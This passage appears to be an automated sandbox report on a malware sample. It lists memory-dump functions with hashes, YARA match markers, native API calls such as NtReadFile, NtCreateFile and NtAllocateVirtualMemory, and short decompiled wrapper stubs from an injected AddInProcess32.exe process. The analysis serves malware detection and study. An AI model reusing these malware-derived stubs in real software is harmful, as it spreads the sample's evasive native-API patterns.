Opcode Fuzzy Hash: 6b335202ff48ce482e258f3458c1965749d4d776a91769237d13095860edf686
Instruction Fuzzy Hash: E04197B4D052089FDB14CFA9C585ADEBFF0AB09314F20906AE429BB260DB74A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05AC25A1, Relevance: 1.8, APIs: 1, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b4ea946be96a373f651339917a9d3c4080136fc9e707e4a2e9fb6fdcb44b74
Instruction ID: c52ee192c402a8297504605ba0acbde60d62f54f07d821849320833eb79a9c9c
Opcode Fuzzy Hash: 14b4ea946be96a373f651339917a9d3c4080136fc9e707e4a2e9fb6fdcb44b74
Instruction Fuzzy Hash: 2A916D39A04104DBDB15CB68D485FADBBB3FF84340F5980AAE596AB395CB349C42CB52

Uniqueness

Uniqueness Score: -1.00%

Function 05AC421C, Relevance: 1.6, APIs: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?), ref: 05AC7981

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: cd212d0afa8ba120bb19844704d46713e7d09bdf946be61cf6d68a75772f18df
Instruction ID: d20d0edeac67538a11f5c9d2daf7c8eab85111257307ee046ef9cee39fbb994a
Opcode Fuzzy Hash: cd212d0afa8ba120bb19844704d46713e7d09bdf946be61cf6d68a75772f18df
Instruction Fuzzy Hash: 5E31A9B4D052589FCB10CFAAD884AEEFBF1FB49314F14806AE419B7210D774AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0280D690, Relevance: 2.6, Strings: 2, Instructions: 138COMMON

Download Yara Rule

Strings

9N, xrefs: 0280D72D
9N, xrefs: 0280D6C4

Memory Dump Source

Source File: 00000000.00000002.753142252.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false

Similarity

API ID:
String ID: 9N$9N
API String ID: 0-1775532845
Opcode ID: 50bf5542dd96b93a3888311ca2cd8190af06a2df47534c8613200661c91ba8da
Instruction ID: 524c44c0da889977b5a4a9e2176461f0f9482c7d382e5a6744be39fb06ff7504
Opcode Fuzzy Hash: 50bf5542dd96b93a3888311ca2cd8190af06a2df47534c8613200661c91ba8da
Instruction Fuzzy Hash: 9A410C7C7402456BF798A7B88C9173F219BEBC4B44F208429D916D73C5CE78BC028796

Uniqueness

Uniqueness Score: -1.00%

Function 05ACD3B5, Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

g, xrefs: 05ACD3B8

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: 30c5ab729131a7d647e53cc585b28a02ec24cd086a435c4e2a32a033c6e26fea
Instruction ID: 90aaa07fb3a478b6232fd07ef3339e88928bba105acf46042bfe4a54c6820238
Opcode Fuzzy Hash: 30c5ab729131a7d647e53cc585b28a02ec24cd086a435c4e2a32a033c6e26fea
Instruction Fuzzy Hash: 4201B2B4D0520C9F8F14CFA9D4418EEFBF2AB5A300F10A16AE818B3300E7319911CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 05ACE030, Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167dbd3d5c45e1deb1d2744e4993034cd329d0a0dc07080bfc7e42d24f00e29a
Instruction ID: 17a82eb9bd60b2af46c6062df8f55e439e5999a4ca482eeb1157d9d131cc8d1d
Opcode Fuzzy Hash: 167dbd3d5c45e1deb1d2744e4993034cd329d0a0dc07080bfc7e42d24f00e29a
Instruction Fuzzy Hash: 67D10831C20A5A8ADB10EF74D950A9DB3B2FF95300F50DB9AD50A37225EB706AC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05ACE040, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82588ea52b76d1bd7dcf8a266afa7b83edc3eb6a822f78903cac87c63bb2729c
Instruction ID: 19706d3d25a4016d7ceac797c62cd17d78544868902d00e6e2094ff42991437b
Opcode Fuzzy Hash: 82588ea52b76d1bd7dcf8a266afa7b83edc3eb6a822f78903cac87c63bb2729c
Instruction Fuzzy Hash: B9D1E731C20A5A8ADB10EF74D95069DB3B2FF99300F50DB9AD50A37225EB706AC5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05AC2228, Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58494c7ddd18f8aa2290460115962e11104e76b501c87f1364d7ca59d4b26338
Instruction ID: 8ec9a89a8ea04fc44a5cb4b5b4f80fe0d6d8cfff49b31f5e2759132b8f361f42
Opcode Fuzzy Hash: 58494c7ddd18f8aa2290460115962e11104e76b501c87f1364d7ca59d4b26338
Instruction Fuzzy Hash: CC81B139B042189FDB08DB75A855B7E7AB3BFC8704F1588ADD546EB389DF3488028791

Uniqueness

Uniqueness Score: -1.00%

Function 05AC6008, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aa0fbe5a9512eb7c8a321f835f061d600512c2f3dab2ec12f24f605b06b3a2e
Instruction ID: 8e9fcb3a283cc1268f773bfe8832cdef9ceb1637bfc96b5ab03a4f91d951cebe
Opcode Fuzzy Hash: 1aa0fbe5a9512eb7c8a321f835f061d600512c2f3dab2ec12f24f605b06b3a2e
Instruction Fuzzy Hash: 9831B7B1E016189FEB18CF6AD9416CAFBF3AFC9300F05C1AAD549AB225EB3059458F50

Uniqueness

Uniqueness Score: -1.00%

Function 05ACD15D, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb8386f00c9100f8e6335142c5c737437d9808e91a3f189fc6bfa7ff6aacacf3
Instruction ID: 6807658b84c2a7cf53420c4c2cd2a59b73545912150a3d039e8efc65d7cfb8c6
Opcode Fuzzy Hash: fb8386f00c9100f8e6335142c5c737437d9808e91a3f189fc6bfa7ff6aacacf3
Instruction Fuzzy Hash: 6A316CB4D05248EFCB14CFAAD484AADBFF2BB49310F24916AE825B7350D7349941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05ACD168, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd9f2da8d1460c43a5ec8c1871fb419d4586e354ffa128db6f767da392c83e9
Instruction ID: 4ca9dd0632d1f93d2ce198ac457a497aff7bb30cc16ce60d0d0d53792ca1d58a
Opcode Fuzzy Hash: afd9f2da8d1460c43a5ec8c1871fb419d4586e354ffa128db6f767da392c83e9
Instruction Fuzzy Hash: 8E315DB4D05208EFCB14CFA9D884AADBFF2BB89310F249169E815B7350D7349941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05ACE5E0, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1dacd7ecd3f1a9e3a0c8e57cbcbafca4b1d41fb8b82dc2560f7ae6c2de620f7
Instruction ID: 5c5a1793bc25580a40f513d195e5194db6010cc2be18611d747f12f590178449
Opcode Fuzzy Hash: e1dacd7ecd3f1a9e3a0c8e57cbcbafca4b1d41fb8b82dc2560f7ae6c2de620f7
Instruction Fuzzy Hash: A521E671E016149BEB19CF6BD94079DFFF7AFC9200F18C1AAD418AB255EB3549428F50

Uniqueness

Uniqueness Score: -1.00%

Function 05AC8428, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b919bb134b6d986f950046894383fca523ad8581811c2f90149f7f9ce927c690
Instruction ID: aed9eac01b8d31f170b022230afeed31138e08ffc96ef0e66d50fa3dbd940dc8
Opcode Fuzzy Hash: b919bb134b6d986f950046894383fca523ad8581811c2f90149f7f9ce927c690
Instruction Fuzzy Hash: B421B871D046188BEB08CFABC94569EFBF3BFC9304F14C5AAD518AB255EB3445028F50

Uniqueness

Uniqueness Score: -1.00%

Function 05ACD47D, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbd8ae6597381068ab1fa6a734aeaa593c8e9a0bb653a0a560f9aa2430175920
Instruction ID: 57ccb806fda94e18754971b0798cc3386580677de51a161af6f2389c37c066b0
Opcode Fuzzy Hash: dbd8ae6597381068ab1fa6a734aeaa593c8e9a0bb653a0a560f9aa2430175920
Instruction Fuzzy Hash: E8219D78D04208AFCB14DFAAC444AEEBBB1BB49314F10E16AE825B7254D7349945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 05ACE5F0, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ae7015b61b8b52236455b73fef8214ea45c537f97b7eec060ab29b04853d5d
Instruction ID: 1945936860731fbdbb2fa7afeeb0cad3f6129c7e0bed97f7a03c65eb8ad34300
Opcode Fuzzy Hash: 81ae7015b61b8b52236455b73fef8214ea45c537f97b7eec060ab29b04853d5d
Instruction Fuzzy Hash: 6721C571E016189BEB18CFABD94479EFEF7AFC8200F14C1BAD419A7255EB3549428F00

Uniqueness

Uniqueness Score: -1.00%

Function 05AC8438, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b56aca9ec7d925a638e94425585d6b771bb1500c86767ee5e793c5be8f255da1
Instruction ID: e6734b4007be87297ec2fd232e9e078fb7fcd32ecb86f7ffcc43c4f3f75f99c5
Opcode Fuzzy Hash: b56aca9ec7d925a638e94425585d6b771bb1500c86767ee5e793c5be8f255da1
Instruction Fuzzy Hash: 24219971D006188BEB58CFABC94569EFAF7BFC8304F14C16AC519AB254EB354502CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05ACD488, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d272ac36358ed3021f42d0afa798f4cf6fbd50716f0fc03191203dc4882a31
Instruction ID: 59eafd4a514f48431a4f52f9b93fb8b8219d87ea7382c227ff6dbb8ac1525097
Opcode Fuzzy Hash: e7d272ac36358ed3021f42d0afa798f4cf6fbd50716f0fc03191203dc4882a31
Instruction Fuzzy Hash: EF219FB8D04208EFDB14CFAAD484AEEBBF1BB49314F10E169E825B7250D7349945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 05ACD3C0, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.762128296.0000000005AC0000.00000040.00000001.sdmp, Offset: 05AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction ID: 91c60fff1719e7f0931fc2b934a288e0b8db87cb1646fccf5f59b422ef5741d3
Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction Fuzzy Hash: 18F042B5D0520C9F8F04DFA9D5418EEFBF2AB5A310F10A16AE914B7310E73599518FA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AddInProcess32.exe PID: 7140 Parent PID: 6856 AddInProcess32.exeCOMMON

Executed Functions

Function 0041827A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E0041827A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t20;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				asm("adc [ebp-0x74aa740a], esp");
				_t15 = _a4;
				_t30 = _a4 + 0xc48;
				E00418DD0(_t15, _t30,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t20 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t29, _t32); // executed
				return _t20;
			}

0x0041827c
0x00418283
0x0041828f
0x00418297
0x0041829c
0x004182a2
0x004182bd
0x004182c5
0x004182c9

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182A2, 004182B0
b=A, xrefs: 004182BD, 004182C4
!:A, xrefs: 0041829C, 004182A8

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: 6905022bfff6c360c37e39531623e30200e0e308bf58be22cd1fb9589c6fc0b2
Instruction ID: d149421ebbda5b49ee0c7619e7656ac0850391a34ea1661cc552ed47f2c0d52a
Opcode Fuzzy Hash: 6905022bfff6c360c37e39531623e30200e0e308bf58be22cd1fb9589c6fc0b2
Instruction Fuzzy Hash: 7DF0F9B2200108AFCB14CF89DC80DEB77A9FF8C354F158249FA0D97241D630E812CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418280, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc48;
				E00418DD0(_t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418283
0x0041828f
0x00418297
0x0041829c
0x004182a2
0x004182bd
0x004182c5
0x004182c9

APIs

NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5

Strings

b=A, xrefs: 004182A2, 004182B0
b=A, xrefs: 004182BD, 004182C4
!:A, xrefs: 0041829C, 004182A8

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181CA, Relevance: 1.5, APIs: 1, Instructions: 42
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004181CA(void* __eax, void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t26;

				asm("rcl dword [ebp-0x75], 1");
				_t20 = _a4;
				_t5 = _t20 + 0xc40; // 0xc40
				E00418DD0(_a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t26 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t26;
			}

0x004181cf
0x004181d3
0x004181df
0x004181e7
0x0041821d
0x00418221

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1f43cd1fcefbdc9c280a934e43d29ec9e508c14a71f5d03e481bae9432cef122
Instruction ID: 1895565a246f6e9cfc1875b9e9f1c2c1632b3e6be1deeef945d9bb06d4a6d7e4
Opcode Fuzzy Hash: 1f43cd1fcefbdc9c280a934e43d29ec9e508c14a71f5d03e481bae9432cef122
Instruction Fuzzy Hash: B401A4B2204508AFCB18CF99DC95EEB77A9AF8C354F15825CFA1DD7281C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181df
0x004181e7
0x0041821d
0x00418221

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183AA, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004183AA(void* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				asm("cli");
				asm("aas");
				 *0x8b55bd73 =  *0x8b55bd73 + __edi;
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183aa
0x004183ab
0x004183ac
0x004183b3
0x004183bf
0x004183c7
0x004183e9
0x004183ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 8402c606e77c6921248d212a174eaae0933a3a708fed29372fd17cf814b8da94
Instruction ID: bbc447a7ab747c9906ec03a7555523bf1951166e4318d049cab9b4e1d812ad52
Opcode Fuzzy Hash: 8402c606e77c6921248d212a174eaae0933a3a708fed29372fd17cf814b8da94
Instruction Fuzzy Hash: 4FF08CB1200208AFDB14CF98CC80EEB37A9FF88350F01860DFE0897240C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183bf
0x004183c7
0x004183e9
0x004183ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004182CA, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: c2e0dfc19b90c8ee358080d264224f82b8ea33d8b1b72a718bda1098740940a5
Instruction ID: 69e650abbcb0f02cbad76c3c5f8dea905aae3892337b21920fb63cc1aaa80eda
Opcode Fuzzy Hash: c2e0dfc19b90c8ee358080d264224f82b8ea33d8b1b72a718bda1098740940a5
Instruction Fuzzy Hash: EAC080B51083441BCB10EBA4A4C34D77754FFE175CB14494FECA942643D77DD7515285

Uniqueness

Uniqueness Score: -1.00%

Function 01B799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B799AA

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8104e437a18167168c75dbeea7ce0f7d09d1b4bacf91ea5f5b687325e905b43c
Instruction ID: 5b72aa6bdfcafcb936b91e7a02dff12ed23024cf29f025249377ace29fd752b9
Opcode Fuzzy Hash: 8104e437a18167168c75dbeea7ce0f7d09d1b4bacf91ea5f5b687325e905b43c
Instruction Fuzzy Hash: 439002A234100442D10471998414F061005E7E1741F51C05AE1054558DC759CC62B566

Uniqueness

Uniqueness Score: -1.00%

Function 01B79910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B7991A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 525b645d517378d2ee3d4ceb7fdc86eec4a3a523e3b15ce15595c7d4e49a5222
Instruction ID: 3b6fecccadfcb88ae8fa5353b231a4ef8ed4543eb6c043fa85f412be73796641
Opcode Fuzzy Hash: 525b645d517378d2ee3d4ceb7fdc86eec4a3a523e3b15ce15595c7d4e49a5222
Instruction Fuzzy Hash: D59002B220100402D14471998404B461005A7D0741F51C056E5054558EC7998DE5BAA5

Uniqueness

Uniqueness Score: -1.00%

Function 01B798F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B798FA

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0fa5b4d28539137f108f222dbc62bc6ca2d9a02dcc322256246d269c47d0ac2c
Instruction ID: ecd54fa6db981f1ddb47bec094ed1eb5a4ae9eeadb7d4139877cf1cb41824ef1
Opcode Fuzzy Hash: 0fa5b4d28539137f108f222dbc62bc6ca2d9a02dcc322256246d269c47d0ac2c
Instruction Fuzzy Hash: 7D90026260100502D10571998404A16100AA7D0681F91C067E1014559ECB6589A2F571

Uniqueness

Uniqueness Score: -1.00%

Function 01B79860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B7986A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 515db0064c71c48966501a48b9eefe3f0b7e167edb9279d38d1991d7bdab20e8
Instruction ID: 157668a477749b47b96abb1f9707803d8d5e0791a78d5a11412a9d59220659ca
Opcode Fuzzy Hash: 515db0064c71c48966501a48b9eefe3f0b7e167edb9279d38d1991d7bdab20e8
Instruction Fuzzy Hash: 7B90027220100413D11571998504B071009A7D0681F91C457E041455CDD7968962F561

Uniqueness

Uniqueness Score: -1.00%

Function 01B79840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B7984A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 42c7dca348e60968942b9cdfd674f9207b9e56ae8e6fc8532602c5b1fbab4ca7
Instruction ID: 94968d9295298a853a542672091f3c66cae155c197fa6137b5c5ec075a08f59e
Opcode Fuzzy Hash: 42c7dca348e60968942b9cdfd674f9207b9e56ae8e6fc8532602c5b1fbab4ca7
Instruction Fuzzy Hash: 2A900262242041525549B19984049075006B7E0681791C057E1404954CC6669866EA61

Uniqueness

Uniqueness Score: -1.00%

Function 01B79A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B79A2A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
